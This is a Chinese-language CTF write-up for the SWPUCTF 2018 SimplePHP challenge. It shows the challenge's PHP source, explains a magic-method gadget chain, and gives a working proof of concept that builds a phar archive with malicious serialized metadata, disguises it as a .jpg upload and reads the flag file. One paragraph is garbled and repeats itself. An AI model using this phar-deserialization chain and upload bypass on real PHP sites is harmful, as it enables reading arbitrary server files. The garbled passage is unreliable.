BUUCTF [SWPUCTF 2018]SimplePHP
BUUCTF [WEB][SWPUCTF 2018]SimplePHP Phar反序列化
在这里附上另一位师傅写的文章,是另一道题,相同的题型,讲得非常的详细,大家可以看一看,坐上小车直达
打开题目我们很明显的看到了上传文件的板块和查看文件的板块,选择这个上传文件,显示如图
我们再选择查看文件的板块,url如图所示
我们在’='后面输入我们想要查看的文件,发现直接就给打印出来了,之后我们根据这个查看了几个php文件,得到了如下内容:
file.php:
<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) { echo "<h2>There is no file to show!<h2/>";
}
$show = new Show();
if(file_exists($file)) { $show->source = $file; $show->_show();
} else if (!empty($file)){ die('file doesn\'t exists.');
}
?>
function.php
<?php
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
function upload_file_do() { global $_FILES; $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; //mkdir("upload",0777); if(file_exists("upload/" . $filename)) { unlink($filename); } move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file() { global $_FILES; if(upload_file_check()) { upload_file_do(); }
}
function upload_file_check() { global $_FILES; $allowed_types = array("gif","jpeg","jpg","png"); $temp = explode(".",$_FILES["file"]["name"]); $extension = end($temp); if(empty($extension)) { //echo "<h4>请选择上传的文件:" . "<h4/>"; } else{ if(in_array($extension,$allowed_types)) { return true; } else { echo '<script type="text/javascript">alert("Invalid file!");</script>'; return false; } }
}
?>
class.php
<?php
class C1e4r
{public $test;public $str;public function __construct($name){$this->str = $name;}public function __destruct(){$this->test = $this->str;echo $this->test;}
}class Show
{public $source;public $str;public function __construct($file){$this->source = $file; //$this->source = phar://phar.jpgecho $this->source;}public function __toString(){$content = $this->str['str']->source;return $content;}public function __set($key,$value){$this->$key = $value;}public function _show(){if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {die('hacker!');} else {highlight_file($this->source);}}public function __wakeup(){if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {echo "hacker~";$this->source = "index.php";}}
}
class Test
{public $file;public $params;public function __construct(){$this->params = array();}public function __get($key){return $this->get($key);}public function get($key){if(isset($this->params[$key])) {$value = $this->params[$key];} else {$value = "index.php";}return $this->file_get($value);}public function file_get($value){$text = base64_encode(file_get_contents($value));return $text;}
}
?>
base.php:
<?php session_start();
?>
<!DOCTYPE html>
<html>
<head> <meta charset="utf-8"> <title>web3</title> <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body> <nav class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="index.php">首页</a> </div> <ul class="nav navbar-nav navbra-toggle"> <li class="active"><a href="file.php?file=">查看文件</a></li> <li><a href="upload_file.php">上传文件</a></li> </ul> <ul class="nav navbar-nav navbar-right"> <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> </ul> </div> </nav>
</body>
</html>
<!--flag is in f1ag.php-->
index.php:
<?php
header("content-type:text/html;charset=utf-8");
include 'base.php';
?>
Phar反序列化
操作前请注意:要将 php.ini 中的 phar.readonly 选项设置为 Off,否则无法生成 phar 文件。
<?php
class TestObject {}//自定义构造
$phar = new Phar("phar.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置 stub
$o = new TestObject();//自定义构造
$o -> data='cck';//自定义构造
$phar->setMetadata($o); //将自定义的 meta-data 存入 manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
这个就是大体的框架,之后我们把需要构造的东西替换在上边自定义构造那里
接着回到本题,我们综合进行一下分析,得到最终有用的代码段在class.php中,现在我们来对其精简一下并进行一下分析:
<?php
class C1e4r
{public $test;public $str;public function __destruct(){$this->test = $this->str;echo $this->test;}
}class Show
{public $source;public $str;public function __toString(){$content = $this->str['str']->source;return $content;}}
class Test
{public $file;public $params;public function __get($key){return $this->get($key);}public function get($key){if(isset($this->params[$key])) {$value = $this->params[$key];} else {$value = "index.php";}return $this->file_get($value);}public function file_get($value){$text = base64_encode(file_get_contents($value));return $text;}
}
?>
我们来大致分析一下:
首先我们看C1e4r这个类,这里存在一个_destruct魔术方法,当对象被销毁时会被调用
然后我们看Show这个类,这里存在一个_toString魔术方法,当一个对象被当作字符串对待的时候,会触发这个魔术方法,怎样可以被当作字符串来处理呢,在C1e4r中的echo就是这个作用,所以链子的一部分就出来了:
$a=new C1e4r();
a−>str=newShow();最后我们看Test这个魔术方法,可以看到依次调用get−>get−>fileget,在fileget这里存在filegetcontents这个获取文件命令的函数,这就是我们要利用的地方,所以a->str=new Show(); 最后我们看Test这个魔术方法,可以看到依次调用_get -> get-> file_get,在file_get这里存在file_get_contents这个获取文件命令的函数,这就是我们要利用的地方,所以a−>str=newShow();最后我们看Test这个魔术方法,可以看到依次调用get−>get−>fileget,在fileget这里存在filegetcontents这个获取文件命令的函数,这就是我们要利用的地方,所以value就是我们要读取的文件的位置,来构造另一部分链子:
$b=new Test();
$b->params[value]=’/var/www/html/f1ag.php’; //f1ag.php是根据查看的某个源码上显示出来的
所以我们的思路就是C14er->Show->Test,那么我们构造POC的时候就要反着来
附上POC:
<?php
class Test
{public $str;public $params;public function __construct(){$this->params = array();}}class C1e4r
{public $test;public $str;}class Show
{public $source;public $str = array();}$t = new Test();$c = new C1e4r();$s = new Show();$t->params['source'] = '/var/www/html/f1ag.php';$s->str['str'] = $t;$c->str = $s;@unlink("phar.phar");$phar = new Phar("phar.phar"); $phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); $phar->setMetadata($c); $phar->addFromString("test.txt", "test"); $phar->stopBuffering();
?>
我们在本地访问这个php文件,生成一个phar.phar文件,因为上传文件存在着上传条件,所以我们修改一下文件后缀修改为phar.jpg文件
上传成功了,我们访问一下
最下面那一行就是我们刚刚上传上的文件,我们读取一下
将读到的内容进行base64解密
得到了flag:flag{f9f8bad1-8ea3-4a92-a40a-5ff77e90c699}
BUUCTF [SWPUCTF 2018]SimplePHP相关推荐
- [SWPUCTF 2018]SimplePHP
[SWPUCTF 2018]SimplePHP 知识点:phar反序列化 文章目录 [SWPUCTF 2018]SimplePHP 文件读取 文件上传分析 文件读取分析 phar反序列化 构造pop链 ...
- BUUCTF [HCTF 2018]WarmUp 1
BUUCTF [HCTF 2018]WarmUp 1 f12发现提示source.php 打开后发现php代码: <?phphighlight_file(__FILE__);class emmm ...
- BUUCTF [HCTF 2018] Hide and seek
BUUCTF [HCTF 2018] Hide and seek 考点: 软连接读取任意文件 Flask伪造session /proc/self/environ文件获取当前进程的环境变量列表 rand ...
- BUUCTF [HCTF 2018] admin
BUUCTF [HCTF 2018] admin 解法一:弱密码 解法二:Flask伪造Session 解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启 ...
- buuctf——[CFI-CTF 2018]IntroToPE
1.查壳,无壳,32位,并且是.net. 2.用dnSpy(32位)反编译. 看一下程序运行结果. 可以发现是一个messagebox,关键是在Validate按件(是一个button按钮).在dnS ...
- 【web-ctf】ctf_BUUCTF_web(2)
文章目录 BUUCTF_web SQL注入 1. [RCTF2015]EasySQL 2. [CISCN2019 华北赛区 Day1 Web5]CyberPunk 3. [CISCN2019 总决赛 ...
- buuctf - web - [HCTF 2018]WarmUp
老样子 F12 检查 发现 source.php 被注释掉了 在 url 直接进行访问 可以看到是源代码 发现 high_file 泄漏, 访问 hint.php,可以看到 flag 在那里 回头分析 ...
- BUUCTF-[HCTF 2018]admin1
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码:结果试了 ...
- [BUUCTF]第五天训练日志
文章目录 [ZJCTF 2019]NiZhuanSiWei [BJDCTF2020]Easy MD5 [SUCTF 2019]CheckIn [极客大挑战 2019]Upload [极客大挑战 201 ...
最新文章
- java基本数据类型_Java基础——数据类型
- Spring Boot项目利用MyBatis Generator进行数据层代码自动生成
- 二叉树重建(c++)
- BugKu:cookies 欺骗
- ubuntu 访问php没反应,linux - 在Ubuntu中,我对php.ini进行了更改,但没有任何反应 - Ubuntu问答...
- Python基础教程:对象的方法
- ASP.NET 开发实践--性能与缓存
- RHEL4- DNS服务(四)DNS的开机自动启动控制
- java抓取网页css,Java 读取网页Html资料
- CruiseControl中应用NCover和NCoverExplore
- iOS 两种易混淆的存储路径
- css元素穿透。 pointer-events: none;
- 开课吧9.9元学python靠谱吗-开课吧的Python课程怎么样?大概是多少钱?讲师是廖雪峰吗?...
- cad字体安装_CAD字体如何划分?资源去哪下载?上千种字体资源,免费分享赠送...
- 秦九韶算法java程序_算法 秦九韶算法
- 第三方浏览器h5 android测试,H5案例分享:使用JS判断客户端、浏览器、操作系统类型...
- 我的世界java甘蔗机_我的世界全自动甘蔗机器制作教程
- win10双屏实现窗口流畅拖动
- 资源网站合集 五个值得你收藏的网站
- 爬虫技巧整合(持续更新~)